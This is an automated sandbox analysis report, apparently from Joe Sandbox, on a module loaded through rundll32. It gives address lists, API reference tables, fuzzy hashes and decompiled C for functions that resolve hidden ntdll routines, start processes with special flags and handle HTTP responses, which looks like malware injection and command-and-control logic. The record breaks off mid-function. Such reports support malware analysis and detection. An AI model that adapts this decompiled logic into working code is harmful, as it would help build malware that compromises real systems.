                0x04b911f4
                0x04b91201
                0x04b9120c
                0x04b9120f
                0x04b9121a
                0x04b9121d
                0x04b91222
                0x04b91225
                0x04b9122a
                0x04b9122d
                0x04b91239
                0x04b91246
                0x04b91248
                0x04b9124e
                0x04b91253
                0x04b9125e
                0x04b91260
                0x04b91263
                0x04b9126a
                0x04b9126c
                0x04b91275
                0x04b91280
                0x04b91282
                0x04b91285
                0x04b91285
                0x04b91287
                0x04b9128c
                0x04b9128c
                0x04b91294
                0x04b91298
                0x04b9129e
                0x04b912a9
                0x04b912ab
                0x04b912b0
                0x04b912b5
                0x04b912b8
                0x04b912bd
                0x04b912c8
                0x04b912ca
                0x04b912cd
                0x04b912cd
                0x04b912cf
                0x04b912da
                0x04b912e0
                0x04b912e3
                0x04b912e8
                0x04b912f3
                0x04b912f5
                0x04b912fc
                0x04b91306
                0x04b91306
                0x04b91308
                0x04b9130d
                0x04b91313
                0x04b91316
                0x04b9131b
                0x04b91325
                0x04b91327
                0x04b91336
                0x04b91336
                0x04b91338
                0x04b91346
                0x04b9134b
                0x04b9134d
                0x04b91353
                0x04b91533
                0x04b9153b
                0x04b91548
                0x04b91359
                0x04b91365
                0x04b9136b
                0x04b91371
                0x04b91526
                0x04b91531
                0x00000000
                0x04b91531
                0x04b9137d
                0x04b91382
                0x04b9138b
                0x04b9139c
                0x04b913a0
                0x04b913a9
                0x04b913af
                0x04b913bc
                0x04b913c9
                0x04b913cf
                0x04b91519
                0x04b91524
                0x00000000
                0x04b91524
                0x04b913db
                0x04b913e1
                0x04b913e2
                0x04b913e7
                0x04b913ed
                0x04b9150f
                0x04b91517
                0x00000000
                0x04b91517
                0x04b913f7
                0x04b913fe
                0x04b91408
                0x04b9140e
                0x04b91418
                0x04b9142a
                0x04b9142c
                0x04b91432
                0x04b9154b
                0x04b914fa
                0x04b914fa
                0x04b914ff
                0x04b9150b
                0x04b9150d
                0x00000000
                0x04b9150d
                0x04b9143d
                0x04b91442
                0x04b91448
                0x04b91453
                0x04b9145e
                0x04b91462
                0x04b91468
                0x04b9146e
                0x04b91474
                0x04b91477
                0x04b9147d
                0x04b91480
                0x04b91485
                0x04b91489
                0x04b91489
                0x04b91496
                0x04b914a4
                0x04b914a9
                0x04b914ab
                0x04b914b1
                0x04b914b7
                0x04b914b9
                0x04b914be
                0x04b914c2
                0x04b914de
                0x04b914de
                0x04b914b1
                0x00000000
                0x04b91498
                0x04b9149d
                0x04b914e0
                0x04b914e4
                0x04b914ee
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x04b914ee
                0x04b9149f
                0x00000000
                0x04b9149f
                0x04b91496

                APIs
                • GetTickCount.KERNEL32 ref: 04B911F4
                • wsprintfA.USER32 ref: 04B91241
                • wsprintfA.USER32 ref: 04B9125E
                • wsprintfA.USER32 ref: 04B91280
                • wsprintfA.USER32 ref: 04B912A7
                • wsprintfA.USER32 ref: 04B912C8
                • wsprintfA.USER32 ref: 04B912F3
                • HeapFree.KERNEL32(00000000,?), ref: 04B91306
                • wsprintfA.USER32 ref: 04B91325
                • HeapFree.KERNEL32(00000000,?), ref: 04B91336
                  • Part of subcall function 04B96107: RtlEnterCriticalSection.NTDLL(051095C0), ref: 04B96123
                  • Part of subcall function 04B96107: RtlLeaveCriticalSection.NTDLL(051095C0), ref: 04B96141
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B91365
                • GetTickCount.KERNEL32 ref: 04B91377
                • RtlEnterCriticalSection.NTDLL(051095C0), ref: 04B9138B
                • RtlLeaveCriticalSection.NTDLL(051095C0), ref: 04B913A9
                  • Part of subcall function 04B95D8A: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DB5
                  • Part of subcall function 04B95D8A: lstrlen.KERNEL32(00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DBD
                  • Part of subcall function 04B95D8A: strcpy.NTDLL ref: 04B95DD4
                  • Part of subcall function 04B95D8A: lstrcat.KERNEL32(00000000,00000000), ref: 04B95DDF
                  • Part of subcall function 04B95D8A: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DFC
                • StrTrimA.SHLWAPI(00000000,04B99294,?,05109600), ref: 04B913DB
                  • Part of subcall function 04B927B3: lstrlen.KERNEL32(05109CE0,00000000,00000000,00000000,04B96E08,00000000), ref: 04B927C3
                  • Part of subcall function 04B927B3: lstrlen.KERNEL32(?), ref: 04B927CB
                  • Part of subcall function 04B927B3: lstrcpy.KERNEL32(00000000,05109CE0), ref: 04B927DF
                  • Part of subcall function 04B927B3: lstrcat.KERNEL32(00000000,?), ref: 04B927EA
                • lstrcpy.KERNEL32(00000000,?), ref: 04B913FE
                • lstrcpy.KERNEL32(?,?), ref: 04B91408
                • lstrcat.KERNEL32(?,?), ref: 04B91418
                • lstrcat.KERNEL32(?,00000000), ref: 04B9141F
                  • Part of subcall function 04B92EAF: lstrlen.KERNEL32(?,00000000,05109D00,00000000,04B977C5,05109F23,69B25F44,?,?,?,?,69B25F44,00000005,04B9A00C,4D283A53,?), ref: 04B92EB6
                  • Part of subcall function 04B92EAF: mbstowcs.NTDLL ref: 04B92EDF
                  • Part of subcall function 04B92EAF: memset.NTDLL ref: 04B92EF1
                • wcstombs.NTDLL ref: 04B914C2
                  • Part of subcall function 04B97262: SysAllocString.OLEAUT32(?), ref: 04B9729D
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                • HeapFree.KERNEL32(00000000,?), ref: 04B9150B
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04B91517
                • HeapFree.KERNEL32(00000000,?,?,05109600), ref: 04B91524
                • HeapFree.KERNEL32(00000000,?), ref: 04B91531
                • HeapFree.KERNEL32(00000000,?), ref: 04B9153B
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
                • String ID: Uet$T1y.
                • API String ID: 1185349883-1202656988
                • Opcode ID: e90b184a201ddd3e8fcaaae880b14053a4e69d6c28844f1b8c0ec6c25a682f28
                • Instruction ID: a32d703ea9655c95829a2a0b8cc0bc5dfa25c0b4ced9a83d99b8a0071b76d741
                • Opcode Fuzzy Hash: e90b184a201ddd3e8fcaaae880b14053a4e69d6c28844f1b8c0ec6c25a682f28
                • Instruction Fuzzy Hash: F7A1BA71504214AFDB11EF68DD84E5A7BE8EF8C354F05096AF848D3220CB39ED04DB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E04B9708B(void* __eax, void* __ecx) {
                				long _v8;
                				char _v12;
                				void* _v16;
                				void* _v28;
                				long _v32;
                				void _v104;
                				char _v108;
                				long _t36;
                				intOrPtr _t40;
                				intOrPtr _t47;
                				intOrPtr _t50;
                				void* _t58;
                				void* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t71;
                
                				_t1 = __eax + 0x14; // 0x74183966
                				_t69 =  *_t1;
                				_t36 = E04B97422(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                				_v8 = _t36;
                				if(_t36 != 0) {
                					L12:
                					return _v8;
                				}
                				E04B97B55( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                				_t40 = _v12(_v12);
                				_v8 = _t40;
                				if(_t40 == 0 && ( *0x4b9a300 & 0x00000001) != 0) {
                					_v32 = 0;
                					asm("stosd");
                					asm("stosd");
                					asm("stosd");
                					_v108 = 0;
                					memset( &_v104, 0, 0x40);
                					_t47 =  *0x4b9a348; // 0x56d5a8
                					_t18 = _t47 + 0x4b9b3f3; // 0x73797325
                					_t68 = E04B91F14(_t18);
                					if(_t68 == 0) {
                						_v8 = 8;
                					} else {
                						_t50 =  *0x4b9a348; // 0x56d5a8
                						_t19 = _t50 + 0x4b9b73f; // 0x5108ce7
                						_t20 = _t50 + 0x4b9b0af; // 0x4e52454b
                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                						if(_t71 == 0) {
                							_v8 = 0x7f;
                						} else {
                							_v108 = 0x44;
                							E04B92496();
                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                							_push(1);
                							E04B92496();
                							if(_t58 == 0) {
                								_v8 = GetLastError();
                							} else {
                								CloseHandle(_v28);
                								CloseHandle(_v32);
                							}
                						}
                						HeapFree( *0x4b9a2d8, 0, _t68);
                					}
                				}
                				_t70 = _v16;
                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                				E04B94130(_t70);
                				goto L12;
                			}

                0x04b97093
                0x04b97093
                0x04b970a2
                0x04b970a9
                0x04b970ae
                0x04b971bb
                0x04b971c2
                0x04b971c2
                0x04b970bd
                0x04b970c5
                0x04b970c8
                0x04b970cd
                0x04b970e2
                0x04b970e8
                0x04b970e9
                0x04b970ec
                0x04b970f2
                0x04b970f5
                0x04b970fa
                0x04b97102
                0x04b9710e
                0x04b97112
                0x04b971a2
                0x04b97118
                0x04b97118
                0x04b9711d
                0x04b97124
                0x04b97138
                0x04b9713c
                0x04b9718b
                0x04b9713e
                0x04b9713f
                0x04b97146
                0x04b9715f
                0x04b97161
                0x04b97165
                0x04b9716c
                0x04b97186
                0x04b9716e
                0x04b97177
                0x04b9717c
                0x04b9717c
                0x04b9716c
                0x04b9719a
                0x04b9719a
                0x04b97112
                0x04b971a9
                0x04b971b2
                0x04b971b6
                0x00000000

                APIs
                  • Part of subcall function 04B97422: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04B970A7,?,?,?,?,00000000,00000000), ref: 04B97447
                  • Part of subcall function 04B97422: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04B97469
                  • Part of subcall function 04B97422: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04B9747F
                  • Part of subcall function 04B97422: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04B97495
                  • Part of subcall function 04B97422: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04B974AB
                  • Part of subcall function 04B97422: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04B974C1
                • memset.NTDLL ref: 04B970F5
                  • Part of subcall function 04B91F14: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04B9710E,73797325), ref: 04B91F25
                  • Part of subcall function 04B91F14: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04B91F3F
                • GetModuleHandleA.KERNEL32(4E52454B,05108CE7,73797325), ref: 04B9712B
                • GetProcAddress.KERNEL32(00000000), ref: 04B97132
                • HeapFree.KERNEL32(00000000,00000000), ref: 04B9719A
                  • Part of subcall function 04B92496: GetProcAddress.KERNEL32(36776F57,04B9591A), ref: 04B924B1
                • CloseHandle.KERNEL32(00000000,00000001), ref: 04B97177
                • CloseHandle.KERNEL32(?), ref: 04B9717C
                • GetLastError.KERNEL32(00000001), ref: 04B97180
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                • String ID: Uet$@MetNet
                • API String ID: 3075724336-1616585941
                • Opcode ID: d2a68d9c113fe695e8aacc887e8ef02188358f4556aebaa535ae5b4ad806855c
                • Instruction ID: 5753c8a2a9df6d2f6013e21c157b13231d49ae5ef3cbd74ca5f1e39a1e7dc498
                • Opcode Fuzzy Hash: d2a68d9c113fe695e8aacc887e8ef02188358f4556aebaa535ae5b4ad806855c
                • Instruction Fuzzy Hash: AE311FB6900219FFEF10AFA4DD88E9EBBFCEB08344F1145B9E605A7111DB34AD558B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B91555(void* __ecx, void* __esi) {
                				long _v8;
                				long _v12;
                				long _v16;
                				long _v20;
                				long _t34;
                				long _t39;
                				long _t42;
                				long _t56;
                				void* _t58;
                				void* _t59;
                				void* _t61;
                
                				_t61 = __esi;
                				_t59 = __ecx;
                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                				do {
                					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                					_v20 = _t34;
                					if(_t34 != 0) {
                						L3:
                						_v8 = 4;
                						_v16 = 0;
                						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                							_t39 = GetLastError();
                							_v12 = _t39;
                							if(_v20 == 0 || _t39 != 0x2ef3) {
                								L15:
                								return _v12;
                							} else {
                								goto L11;
                							}
                						}
                						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                							goto L11;
                						} else {
                							_v16 = 0;
                							_v8 = 0;
                							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                							_t58 = E04B96601(_v8 + 1);
                							if(_t58 == 0) {
                								_v12 = 8;
                							} else {
                								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                									E04B94130(_t58);
                									_v12 = GetLastError();
                								} else {
                									 *((char*)(_t58 + _v8)) = 0;
                									 *(_t61 + 0xc) = _t58;
                								}
                							}
                							goto L15;
                						}
                					}
                					SetEvent( *(_t61 + 0x1c));
                					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                					_v12 = _t56;
                					if(_t56 != 0) {
                						goto L15;
                					}
                					goto L3;
                					L11:
                					_t42 = E04B9705E( *(_t61 + 0x1c), _t59, 0xea60);
                					_v12 = _t42;
                				} while (_t42 == 0);
                				goto L15;
                			}

                0x04b91555
                0x04b91555
                0x04b91565
                0x04b91568
                0x04b9156c
                0x04b91572
                0x04b91577
                0x04b91590
                0x04b915a4
                0x04b915ab
                0x04b915b2
                0x04b91605
                0x04b9160b
                0x04b91611
                0x04b9164c
                0x04b91652
                0x00000000
                0x00000000
                0x00000000
                0x04b91611
                0x04b915b8
                0x00000000
                0x04b915bf
                0x04b915cd
                0x04b915d0
                0x04b915d3
                0x04b915df
                0x04b915e3
                0x04b91645
                0x04b915e5
                0x04b915f7
                0x04b91635
                0x04b91640
                0x04b915f9
                0x04b915fc
                0x04b91600
                0x04b91600
                0x04b915f7
                0x00000000
                0x04b915e3
                0x04b915b8
                0x04b9157c
                0x04b91582
                0x04b91585
                0x04b9158a
                0x00000000
                0x00000000
                0x00000000
                0x04b9161a
                0x04b91622
                0x04b91627
                0x04b9162a
                0x00000000

                APIs
                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,746981D0,00000000,00000000), ref: 04B9156C
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04B96E43,00000000,?), ref: 04B9157C
                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04B915AE
                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04B915D3
                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04B915F3
                • GetLastError.KERNEL32 ref: 04B91605
                  • Part of subcall function 04B9705E: WaitForMultipleObjects.KERNEL32(00000002,04B97CEC,00000000,04B97CEC,?,?,?,04B97CEC,0000EA60), ref: 04B97079
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                • GetLastError.KERNEL32(00000000), ref: 04B9163A
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                • String ID: @MetNet
                • API String ID: 3369646462-2109406137
                • Opcode ID: cfad791de38a57b8e68fa8b7559b0e9c6e878b733c4b6376cf888265ef8a4321
                • Instruction ID: f725cfb32744c79803ce4ce0348bc70a7f7fe41820d11de156669712031e3109
                • Opcode Fuzzy Hash: cfad791de38a57b8e68fa8b7559b0e9c6e878b733c4b6376cf888265ef8a4321
                • Instruction Fuzzy Hash: 8F3100B5D00349EFEF21DFA5C88499EBBF8EB08304F1449BAD552A2241D775AE44EF60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E04B96246(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				char _v20;
                				intOrPtr _v24;
                				signed int _v28;
                				intOrPtr _v32;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t58;
                				signed int _t60;
                				signed int _t62;
                				intOrPtr _t64;
                				intOrPtr _t66;
                				intOrPtr _t70;
                				void* _t72;
                				void* _t75;
                				void* _t76;
                				intOrPtr _t80;
                				WCHAR* _t83;
                				void* _t84;
                				void* _t85;
                				void* _t86;
                				intOrPtr _t92;
                				intOrPtr* _t102;
                				signed int _t103;
                				void* _t104;
                				intOrPtr _t105;
                				void* _t107;
                				intOrPtr* _t115;
                				void* _t119;
                				intOrPtr _t125;
                
                				_t58 =  *0x4b9a3dc; // 0x5109868
                				_v24 = _t58;
                				_v28 = 8;
                				_v20 = GetTickCount();
                				_t60 = E04B976FA();
                				_t103 = 5;
                				_t98 = _t60 % _t103 + 6;
                				_t62 = E04B976FA();
                				_t117 = _t62 % _t103 + 6;
                				_v32 = _t62 % _t103 + 6;
                				_t64 = E04B929C0(_t60 % _t103 + 6);
                				_v16 = _t64;
                				if(_t64 != 0) {
                					_t66 = E04B929C0(_t117);
                					_v12 = _t66;
                					if(_t66 != 0) {
                						_push(5);
                						_t104 = 0xa;
                						_t119 = E04B91AA4(_t104,  &_v20);
                						if(_t119 == 0) {
                							_t119 = 0x4b9918c;
                						}
                						_t70 = E04B9583B(_v24);
                						_v8 = _t70;
                						if(_t70 != 0) {
                							_t115 = __imp__;
                							_t72 =  *_t115(_t119);
                							_t75 =  *_t115(_v8);
                							_t76 =  *_t115(_a4);
                							_t80 = E04B96601(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                							_v24 = _t80;
                							if(_t80 != 0) {
                								_t105 =  *0x4b9a348; // 0x56d5a8
                								_t102 =  *0x4b9a138; // 0x4b97e82
                								_t28 = _t105 + 0x4b9bb08; // 0x530025
                								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                								_push(4);
                								_t107 = 5;
                								_t83 = E04B91AA4(_t107,  &_v20);
                								_a8 = _t83;
                								if(_t83 == 0) {
                									_a8 = 0x4b99190;
                								}
                								_t84 =  *_t115(_a8);
                								_t85 =  *_t115(_v8);
                								_t86 =  *_t115(_a4);
                								_t125 = E04B96601(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                								if(_t125 == 0) {
                									E04B94130(_v24);
                								} else {
                									_t92 =  *0x4b9a348; // 0x56d5a8
                									_t44 = _t92 + 0x4b9bc80; // 0x73006d
                									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                									 *_a16 = _v24;
                									_v28 = _v28 & 0x00000000;
                									 *_a20 = _t125;
                								}
                							}
                							E04B94130(_v8);
                						}
                						E04B94130(_v12);
                					}
                					E04B94130(_v16);
                				}
                				return _v28;
                			}

                APIs
                • GetTickCount.KERNEL32 ref: 04B9625E
                • lstrlen.KERNEL32(00000000,00000005), ref: 04B962DF
                • lstrlen.KERNEL32(?), ref: 04B962F0
                • lstrlen.KERNEL32(00000000), ref: 04B962F7
                • lstrlenW.KERNEL32(80000002), ref: 04B962FE
                • lstrlen.KERNEL32(?,00000004), ref: 04B96367
                • lstrlen.KERNEL32(?), ref: 04B96370
                • lstrlen.KERNEL32(?), ref: 04B96377
                • lstrlenW.KERNEL32(?), ref: 04B9637E
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrlen$CountFreeHeapTick
                • String ID:
                • API String ID: 2535036572-0
                • Opcode ID: b74bca426eec2c41c706056d629caf7af58ed4da0bd980469276b206f77b6c81
                • Instruction ID: fb75b9d9522a42ee7cc1c0ecb0ccb755b7f8b34f87f9454c81cfcac6c72237dc
                • Opcode Fuzzy Hash: b74bca426eec2c41c706056d629caf7af58ed4da0bd980469276b206f77b6c81
                • Instruction Fuzzy Hash: 4E514C72D00229ABDF12AFA8DC44ADE7BF5EF44318F0540A5E914A7210DB35EE25DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B9236F(intOrPtr _a4) {
                				void* _t2;
                				unsigned int _t4;
                				void* _t5;
                				long _t6;
                				void* _t7;
                				void* _t15;
                
                				_t2 = CreateEventA(0, 1, 0, 0);
                				 *0x4b9a30c = _t2;
                				if(_t2 == 0) {
                					return GetLastError();
                				}
                				_t4 = GetVersion();
                				if(_t4 != 5) {
                					L4:
                					if(_t15 <= 0) {
                						_t5 = 0x32;
                						return _t5;
                					}
                					L5:
                					 *0x4b9a2fc = _t4;
                					_t6 = GetCurrentProcessId();
                					 *0x4b9a2f8 = _t6;
                					 *0x4b9a304 = _a4;
                					_t7 = OpenProcess(0x10047a, 0, _t6);
                					 *0x4b9a2f4 = _t7;
                					if(_t7 == 0) {
                						 *0x4b9a2f4 =  *0x4b9a2f4 | 0xffffffff;
                					}
                					return 0;
                				}
                				if(_t4 >> 8 > 0) {
                					goto L5;
                				}
                				_t15 = _t4 - _t4;
                				goto L4;
                			}

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04B96914,?), ref: 04B92377
                • GetVersion.KERNEL32 ref: 04B92386
                • GetCurrentProcessId.KERNEL32 ref: 04B923A2
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04B923BF
                • GetLastError.KERNEL32 ref: 04B923DE
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                • String ID: @MetNet
                • API String ID: 2270775618-2109406137
                • Opcode ID: 4aa24cd264e0b4fbb17e7f98f6334614d4bb4a4a9948b3e7888d70a2927febe5
                • Instruction ID: 6751cbe0294a2eb9184968cf565e7a9800e7f612effb2f8aa4409e838319a4e3
                • Opcode Fuzzy Hash: 4aa24cd264e0b4fbb17e7f98f6334614d4bb4a4a9948b3e7888d70a2927febe5
                • Instruction Fuzzy Hash: C2F012B4A44342FFDF584B356A19B143BA1E709751F1048ABE526D72C0DA795C84CA36
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(00000000), ref: 04B9522D
                • SysAllocString.OLEAUT32(0070006F), ref: 04B95241
                • SysAllocString.OLEAUT32(00000000), ref: 04B95253
                • SysFreeString.OLEAUT32(00000000), ref: 04B952BB
                • SysFreeString.OLEAUT32(00000000), ref: 04B952CA
                • SysFreeString.OLEAUT32(00000000), ref: 04B952D5
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: ab88fc900f2c9ecaecb227a475217ba949be870e62e928e34ce7fd1b76454f90
                • Instruction ID: d5cb28a79357e15c9c5e584896e65a261d3f7e500f35e217ef7bf68fec38275e
                • Opcode Fuzzy Hash: ab88fc900f2c9ecaecb227a475217ba949be870e62e928e34ce7fd1b76454f90
                • Instruction Fuzzy Hash: 86415F32900609BBDF12DFF8D845A9EB7F9EF49310F14446AE911EB250DA71AD05CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B97422(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                				intOrPtr _v8;
                				intOrPtr _t23;
                				intOrPtr _t26;
                				_Unknown_base(*)()* _t28;
                				intOrPtr _t30;
                				_Unknown_base(*)()* _t32;
                				intOrPtr _t33;
                				_Unknown_base(*)()* _t35;
                				intOrPtr _t36;
                				_Unknown_base(*)()* _t38;
                				intOrPtr _t39;
                				_Unknown_base(*)()* _t41;
                				intOrPtr _t44;
                				struct HINSTANCE__* _t48;
                				intOrPtr _t54;
                
                				_t54 = E04B96601(0x20);
                				if(_t54 == 0) {
                					_v8 = 8;
                				} else {
                					_t23 =  *0x4b9a348; // 0x56d5a8
                					_t1 = _t23 + 0x4b9b11a; // 0x4c44544e
                					_t48 = GetModuleHandleA(_t1);
                					_t26 =  *0x4b9a348; // 0x56d5a8
                					_t2 = _t26 + 0x4b9b761; // 0x7243775a
                					_v8 = 0x7f;
                					_t28 = GetProcAddress(_t48, _t2);
                					 *(_t54 + 0xc) = _t28;
                					if(_t28 == 0) {
                						L8:
                						E04B94130(_t54);
                					} else {
                						_t30 =  *0x4b9a348; // 0x56d5a8
                						_t5 = _t30 + 0x4b9b74e; // 0x614d775a
                						_t32 = GetProcAddress(_t48, _t5);
                						 *(_t54 + 0x10) = _t32;
                						if(_t32 == 0) {
                							goto L8;
                						} else {
                							_t33 =  *0x4b9a348; // 0x56d5a8
                							_t7 = _t33 + 0x4b9b771; // 0x6e55775a
                							_t35 = GetProcAddress(_t48, _t7);
                							 *(_t54 + 0x14) = _t35;
                							if(_t35 == 0) {
                								goto L8;
                							} else {
                								_t36 =  *0x4b9a348; // 0x56d5a8
                								_t9 = _t36 + 0x4b9b4ca; // 0x4e6c7452
                								_t38 = GetProcAddress(_t48, _t9);
                								 *(_t54 + 0x18) = _t38;
                								if(_t38 == 0) {
                									goto L8;
                								} else {
                									_t39 =  *0x4b9a348; // 0x56d5a8
                									_t11 = _t39 + 0x4b9b786; // 0x6c43775a
                									_t41 = GetProcAddress(_t48, _t11);
                									 *(_t54 + 0x1c) = _t41;
                									if(_t41 == 0) {
                										goto L8;
